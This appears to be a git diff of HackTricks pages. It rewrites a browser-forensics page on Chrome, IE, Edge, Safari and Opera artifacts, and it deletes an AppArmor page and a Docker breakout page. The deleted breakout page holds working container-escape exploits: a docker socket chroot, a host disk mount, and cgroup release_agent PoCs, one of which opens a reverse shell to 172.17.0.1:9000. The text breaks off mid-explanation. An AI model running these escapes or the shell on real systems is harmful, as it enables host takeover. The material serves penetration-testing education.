-Most of the information will be saved inside the _**Default/**_ or _**ChromeDefaultData/**_ folders inside the paths indicated before. Here you can find the following interesting files: +Google Chrome stores user profiles in specific locations based on the operating system: + +- **Linux**: `~/.config/google-chrome/` +- **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\` +- **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/` + +Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data: + +- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. +- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. +- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). +- **Bookmarks**: User bookmarks. +- **Web Data**: Contains form history. +- **Favicons**: Stores website favicons. +- **Login Data**: Includes login credentials like usernames and passwords. +- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs. +- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed. +- **Extensions**: Directories for browser extensions and addons. +- **Thumbnails**: Stores website thumbnails. +- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more. +- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output. -* _**History**_: URLs, downloads and even searched keywords. In Windows, you can use the tool [ChromeHistoryView](https://www.nirsoft.net/utils/chrome\_history\_view.html) to read the history. The "Transition Type" column means: - * Link: User clicked on a link - * Typed: The url was written - * Auto Bookmark - * Auto Subframe: Add - * Start page: Home page - * Form Submit: A form was filled and sent - * Reloaded -* _**Cookies**_: Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies. -* _**Cache**_: Cache. In Windows, you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca -* _**Bookmarks**_: Bookmarks -* _**Web Data**_: Form History -* _**Favicons**_: Favicons -* _**Login Data**_: Login information (usernames, passwords...) -* _**Current Session**_ and _**Current Tabs**_: Current session data and current tabs -* _**Last Session**_ and _**Last Tabs**_: These files hold sites that were active in the browser when Chrome was last closed. -* _**Extensions**_: Extensions and addons folder -* **Thumbnails** : Thumbnails -* **Preferences**: This file contains a plethora of good information such as plugins, extensions, sites using geolocation, popups, notifications, DNS prefetching, certificate exceptions, and much more. If you’re trying to research whether or not a specific Chrome setting was enabled, you will likely find that setting in here. -* **Browser’s built-in anti-phishing:** `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` - * You can simply grep for β€œ**safebrowsing**” and look for `{"enabled: true,"}` in the result to indicate anti-phishing and malware protection is on. ## **SQLite DB Data Recovery** @@ -137,138 +122,65 @@ As you can observe in the previous sections, both Chrome and Firefox use **SQLit ## **Internet Explorer 11** -Internet Explorer stores **data** and **metadata** in different locations. The metadata will allow finding the data. +Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management. -The **metadata** can be found in the folder `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` where VX can be V01, V16, or V24.\ -In the previous folder, you can also find the file V01.log. In case the **modified time** of this file and the WebcacheVX.data file **are different** you may need to run the command `esentutl /r V01 /d` to **fix** possible **incompatibilities**. +### Metadata Storage +Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype. -Once **recovered** this artifact (It's an ESE database, photorec can recover it with the options Exchange Database or EDB) you can use the program [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Once **opened**, go to the table named "**Containers**". +### Cache Inspection +The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times. -![](<../../../.gitbook/assets/image (446).png>) +### Cookies Management +Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory. -Inside this table, you can find in which other tables or containers each part of the stored information is saved. Following that, you can find the **locations of the data** stored by the browsers and the **metadata** that is inside. +### Download Details +Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. -**Note that this table indicates metadata of the cache for other Microsoft tools also (e.g. skype)** +### Browsing History +To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. -### Cache +### Typed URLs +Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times. -You can use the tool [IECacheView](https://www.nirsoft.net/utils/ie\_cache\_viewer.html) to inspect the cache. You need to indicate the folder where you have extracted the cache date. - -#### Metadata - -The metadata information about the cache stores: - -* Filename in the disc -* SecureDIrectory: Location of the file inside the cache directories -* AccessCount: Number of times it was saved in the cache -* URL: The url origin -* CreationTime: First time it was cached -* AccessedTime: Time when the cache was used -* ModifiedTime: Last webpage version -* ExpiryTime: Time when the cache will expire - -#### Files - -The cache information can be found in _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5**_ and _**%userprofile%\Appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\low**_ - -The information inside these folders is a **snapshot of what the user was seeing**. The caches have a size of **250 MB** and the timestamps indicate when the page was visited (first time, creation date of the NTFS, last time, modification time of the NTFS). - -### Cookies - -You can use the tool [IECookiesView](https://www.nirsoft.net/utils/iecookies.html) to inspect the cookies. You need to indicate the folder where you have extracted the cookies. - -#### **Metadata** - -The metadata information about the cookies stored: - -* Cookie name in the filesystem -* URL -* AccessCount: Number of times the cookies have been sent to the server -* CreationTime: First time the cookie was created -* ModifiedTime: Last time the cookie was modified -* AccessedTime: Last time the cookie was accessed -* ExpiryTime: Time of expiration of the cookie - -#### Files - -The cookies data can be found in _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies**_ and _**%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies\low**_ - -Session cookies will reside in memory and persistent cookie in the disk. - -### Downloads - -#### **Metadata** - -Checking the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) you can find the container with the metadata of the downloads: - -![](<../../../.gitbook/assets/image (445).png>) - -Getting the information of the column "ResponseHeaders" you can transform from hex that information and obtain the URL, the file type and the location of the downloaded file. - -#### Files - -Look in the path _**%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory**_ - -### **History** - -The tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history. But first, you need to indicate the browser in advanced options and the location of the extracted history files. - -#### **Metadata** - -* ModifiedTime: First time a URL is found -* AccessedTime: Last time -* AccessCount: Number of times accessed - -#### **Files** - -Search in _**userprofile%\Appdata\Local\Microsoft\Windows\History\History.IE5**_ and _**userprofile%\Appdata\Local\Microsoft\Windows\History\Low\History.IE5**_ - -### **Typed URLs** - -This information can be found inside the registry NTDUSER.DAT in the path: - -* _**Software\Microsoft\InternetExplorer\TypedURLs**_ - * Stores the last 50 URLs typed by the user -* _**Software\Microsoft\InternetExplorer\TypedURLsTime**_ - * last time the URL was typed ## Microsoft Edge -For analyzing Microsoft Edge artifacts all the **explanations about cache and locations from the previous section (IE 11) remain valid** with the only difference that the base locating, in this case, is _**%userprofile%\Appdata\Local\Packages**_ (as can be observed in the following paths): +Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are: -* Profile Path: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC**_ -* History, Cookies and Downloads: _**C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat**_ -* Settings, Bookmarks, and Reading List: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb**_ -* Cache: _**C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC#!XXX\MicrosoftEdge\Cache**_ -* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_ +- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` +- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` +- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb` +- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache` +- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active` -## **Safari** +## Safari -The databases can be found in `/Users/$User/Library/Safari` +Safari data is stored at `/Users/$User/Library/Safari`. Key files include: -* **History.db**: The tables `history_visits` _and_ `history_items` contains information about the history and timestamps. - * `sqlite3 ~/Library/Safari/History.db "SELECT h.visit_time, i.url FROM history_visits h INNER JOIN history_items i ON h.history_item = i.id"` -* **Downloads.plist**: Contains the info about the downloaded files. -* **Book-marks.plis**t: URLs bookmarked. -* **TopSites.plist**: List of the most visited websites that the user browses to. -* **Extensions.plist**: To retrieve an old-style list of Safari browser extensions. - * `plutil -p ~/Library/Safari/Extensions/Extensions.plist| grep "Bundle Directory Name" | sort --ignore-case` - * `pluginkit -mDvvv -p com.apple.Safari.extension` -* **UserNotificationPermissions.plist**: Domains that are allowed to push notifications. - * `plutil -p ~/Library/Safari/UserNotificationPermissions.plist | grep -a3 '"Permission" => 1'` -* **LastSession.plist**: Tabs that were opened the last time the user exited Safari. - * `plutil -p ~/Library/Safari/LastSession.plist | grep -iv sessionstate` -* **Browser’s built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites` - * The reply should be 1 to indicate the setting is active +- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query. +- **Downloads.plist**: Information about downloaded files. +- **Bookmarks.plist**: Stores bookmarked URLs. +- **TopSites.plist**: Most frequently visited sites. +- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve. +- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse. +- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse. +- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active. ## Opera -The databases can be found in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` +Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads. -Opera **stores browser history and download data in the exact same format as Google Chrome**. This applies to the file names as well as the table names. +- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`. + +These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. + + +# References +* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a) +* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/) +* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) +* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -* **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences` - * **fraud\_protection\_enabled** should be **true**
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index e793b9666..7755d0972 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -25,19 +25,19 @@ Wscript.Echo "Like this?" ## Commnets -```text +```bas ' this is a comment ``` ## Test -```text +```bas cscript.exe file.vbs ``` ## Write data to a file -```aspnet +```js Function writeBinary(strBinary, strPath) Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") diff --git a/linux-unix/privilege-escalation/apparmor.md b/linux-unix/privilege-escalation/apparmor.md deleted file mode 100644 index c8c2cbe23..000000000 --- a/linux-unix/privilege-escalation/apparmor.md +++ /dev/null @@ -1,281 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -# Basic Information - -**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources **with **per-program profiles**. Profiles can **allow** **capabilities** like network access, raw socket access, and the permission to read, write, or execute files on matching paths. - -It's a Mandatory Access Control or **MAC** that binds **access control** attributes **to programs rather than to users**.\ -AppArmor confinement is provided via **profiles loaded into the kernel**, typically on boot.\ -AppArmor profiles can be in one of **two modes**: - -* **Enforcement**: Profiles loaded in enforcement mode will result in **enforcement of the policy** defined in the profile **as well as reporting** policy violation attempts (either via syslog or auditd). -* **Complain**: Profiles in complain mode **will not enforce policy** but instead **report** policy **violation** attempts. - -AppArmor differs from some other MAC systems on Linux: it is **path-based**, it allows mixing of enforcement and complain mode profiles, it uses include files to ease development, and it has a far lower barrier to entry than other popular MAC systems. - -## Parts of AppArmor - -* **Kernel module**: Does the actual work -* **Policies**: Defines the behaviour and containment -* **Parser**: Loads the policies into kernel -* **Utilities**: Usermode programs to interact with apparmor - -## Profiles path - -Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\ -With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder. - -For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_ - -## Commands - -```bash -aa-status #check the current status -aa-enforce #set profile to enforce mode (from disable or complain) -aa-complain #set profile to complain mode (from diable or enforcement) -apparmor_parser #to load/reload an altered policy -aa-genprof #generate a new profile -aa-logprof #used to change the policy when the binary/program is changed -aa-mergeprof #used to merge the policies -``` - -# Creating a profile - -* In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -* To indicate the access the binary will have over **files** the following **access controls** can be used: - * **r** (read) - * **w** (write) - * **m** (memory map as executable) - * **k** (file locking) - * **l** (creation hard links) - * **ix** (to execute another program with the new program inheriting policy) - * **Px** (execute under another profile, after cleaning the environment) - * **Cx** (execute under a child profile, after cleaning the environment) - * **Ux** (execute unconfined, after cleaning the environment) -* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file) -* **Deny rules are supported to override allow rules**. - -## aa-genprof - -To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\ -You just need to run: - -```bash -sudo aa-genprof /path/to/binary -``` - -Then, in a different console perform all the actions that the binary will usually perform: - -```bash -/path/to/binary -a dosomething -``` - -Then, in the first console press "**s**" and then in the recorded actions indicate if you want to ignore, allow, or whatever. When you have finished press "**f**" and the new profile will be created in _/etc/apparmor.d/path.to.binary_ - -{% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever -{% endhint %} - -## aa-easyprof - -You can also create a template of an apparmor profile of a binary with: - -```bash -sudo aa-easyprof /path/to/binary -# vim:syntax=apparmor -# AppArmor policy for binary -# ###AUTHOR### -# ###COPYRIGHT### -# ###COMMENT### - -#include - -# No template variables specified - -"/path/to/binary" { - #include - - # No abstractions specified - - # No policy groups specified - - # No read paths specified - - # No write paths specified -} -``` - -{% hint style="info" %} -Note that by default in a created profile nothing is allowed, so everything is denied. You will need to add lines like `/etc/passwd r,` to allow the binary read `/etc/passwd` for example. -{% endhint %} - -You can then **enforce** the new profile with - -```bash -sudo apparmor_parser -a /etc/apparmor.d/path.to.binary -``` - -## Modifying a profile from logs - -The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions: - -```bash -sudo aa-logprof -``` - -{% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever -{% endhint %} - -## Managing a Profile - -```bash -#Main profile management commands -apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode -apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain mode -apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile -apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile -``` - -# Logs - -Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**: - -```bash -type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 -type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 -``` - -You can also get this information using: - -```bash -sudo aa-notify -s 1 -v -Profile: /bin/service_bin -Operation: open -Name: /etc/passwd -Denied: r -Logfile: /var/log/audit/audit.log - -Profile: /bin/service_bin -Operation: open -Name: /etc/hosts -Denied: r -Logfile: /var/log/audit/audit.log - -AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021) -For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor -``` - -# Apparmor in Docker - -Note how the profile **docker-profile** of docker is loaded by default: - -```bash -sudo aa-status -apparmor module is loaded. -50 profiles are loaded. -13 profiles are in enforce mode. - /sbin/dhclient - /usr/bin/lxc-start - /usr/lib/NetworkManager/nm-dhcp-client.action - /usr/lib/NetworkManager/nm-dhcp-helper - /usr/lib/chromium-browser/chromium-browser//browser_java - /usr/lib/chromium-browser/chromium-browser//browser_openjdk - /usr/lib/chromium-browser/chromium-browser//sanitized_helper - /usr/lib/connman/scripts/dhclient-script - docker-default -``` - -By default **Apparmor docker-default profile** is generated from [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) - -**docker-default profile Summary**: - -* **Access** to all **networking** -* **No capability** is defined (However, some capabilities will come from including basic base rules i.e. #include \ ) -* **Writing** to any **/proc** file is **not allowed** -* Other **subdirectories**/**files** of /**proc** and /**sys** are **denied** read/write/lock/link/execute access -* **Mount** is **not allowed** -* **Ptrace** can only be run on a process that is confined by **same apparmor profile** - -Once you **run a docker container** you should see the following output: - -```bash -1 processes are in enforce mode. - docker-default (825) -``` - -Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS_ADMIN capability is granted** because by default docker apparmor profile denies this access: - -```bash -docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash -echo "" > /proc/stat -sh: 1: cannot create /proc/stat: Permission denied -``` - -You need to **disable apparmor** to bypass its restrictions: - -```bash -docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash -``` - -Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS_ADMIN capability. - -Note that you can **add/remove** **capabilities** to the docker container (this will be still restricted by protection methods like **AppArmor** and **Seccomp**): - -* `--cap-add=SYS_ADMIN`_ _give_ _`SYS_ADMIN` cap -* `--cap-add=ALL`_ _give_ _all caps -* `--cap-drop=ALL --cap-add=SYS_PTRACE` drop all caps and only give `SYS_PTRACE` - -{% hint style="info" %} -Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**. -{% endhint %} - -## AppArmor Docker breakout - -You can find which **apparmor profile is running a container** using: - -```bash -docker inspect 9d622d73a614 | grep lowpriv - "AppArmorProfile": "lowpriv", - "apparmor=lowpriv" -``` - -Then, you can run the following line to **find the exact profile being used**: - -```bash -find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null -``` - -In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them. - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/linux-unix/privilege-escalation/docker-breakout.md b/linux-unix/privilege-escalation/docker-breakout.md deleted file mode 100644 index ddeaea384..000000000 --- a/linux-unix/privilege-escalation/docker-breakout.md +++ /dev/null @@ -1,592 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -# What is a container - -In summary, it's an **isolated** **process** via **cgroups** (what the process can use, like CPU and RAM) and **namespaces** (what the process can see, like directories or other processes): - -```bash -docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container -ps -ef | grep 1234 #Get info about the sleep process -ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) -``` - -# Mounted docker socket - -If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\ -This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions. - -```bash -#Search the socket -find / -name docker.sock 2>/dev/null -#It's usually in /run/docker.sock -``` - -In this case you can use regular docker commands to communicate with the docker daemon: - -```bash -#List images to use one -docker images -#Run the image mounting the host disk and chroot on it -docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash -``` - -{% hint style="info" %} -In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`** -{% endhint %} - -# Container Capabilities - -You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE`** - -You can check currently container capabilities with: - -```bash -capsh --print -``` - -In the following page you can **learn more about linux capabilities** and how to abuse them: - -{% content-ref url="linux-capabilities.md" %} -[linux-capabilities.md](linux-capabilities.md) -{% endcontent-ref %} - -# `--privileged` flag - -The --privileged flag allows the container to have access to the host devices. - -## I own Root - -Well configured docker containers won't allow command like **fdisk -l**. However on missconfigured docker command where the flag --privileged is specified, it is possible to get the privileges to see the host drive. - -![](https://bestestredteam.com/content/images/2019/08/image-16.png) - -So to take over the host machine, it is trivial: - -```bash -mkdir -p /mnt/hola -mount /dev/sda1 /mnt/hola -``` - -And voilΓ  ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola `folder. - -{% code title="Initial PoC" %} -```bash -# spawn a new container to exploit via: -# docker run --rm -it --privileged ubuntu bash - -d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` -mkdir -p $d/w;echo 1 >$d/w/notify_on_release -t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -touch /o; -echo $t/c >$d/release_agent; -echo "#!/bin/sh $1 >$t/o" >/c; -chmod +x /c; -sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o -``` -{% endcode %} - -{% code title="Second PoC" %} -```bash -# On the host -docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash - -# In the container -mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -echo 1 > /tmp/cgrp/x/notify_on_release -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -echo "$host_path/cmd" > /tmp/cgrp/release_agent - -#For a normal PoC ================= -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#=================================== -#Reverse shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/172.17.0.1/9000 0>&1" >> /cmd -chmod a+x /cmd -#=================================== - -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" -head /output -``` -{% endcode %} - -The `--privileged` flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. - -In fact, `--privileged` provides far more permissions than needed to escape a docker container via this method. In reality, the β€œonly” requirements are: - -1. We must be running as root inside the container -2. The container must be run with the `SYS_ADMIN` Linux capability -3. The container must lack an AppArmor profile, or otherwise allow the `mount` syscall -4. The cgroup v1 virtual filesystem must be mounted read-write inside the container - -The `SYS_ADMIN` capability allows a container to perform the mount syscall (see [man 7 capabilities](https://linux.die.net/man/7/capabilities)). [Docker starts containers with a restricted set of capabilities](https://docs.docker.com/engine/security/security/#linux-kernel-capabilities) by default and does not enable the `SYS_ADMIN` capability due to the security risks of doing so. - -Further, Docker [starts containers with the `docker-default` AppArmor](https://docs.docker.com/engine/security/apparmor/#understand-the-policies) policy by default, which [prevents the use of the mount syscall](https://github.com/docker/docker-ce/blob/v18.09.8/components/engine/profiles/apparmor/template.go#L35) even when the container is run with `SYS_ADMIN`. - -A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` - -## Breaking down the proof of concept - -Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works. - -To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. - -To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup (named β€œx” for the purposes of this example). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers. - -If you’re following along and get β€œmount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change `rdma` to `memory` to fix it. We’re using RDMA because the original PoC was only designed to work with it. - -Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another. - -We can see the β€œx” child cgroup creation and its 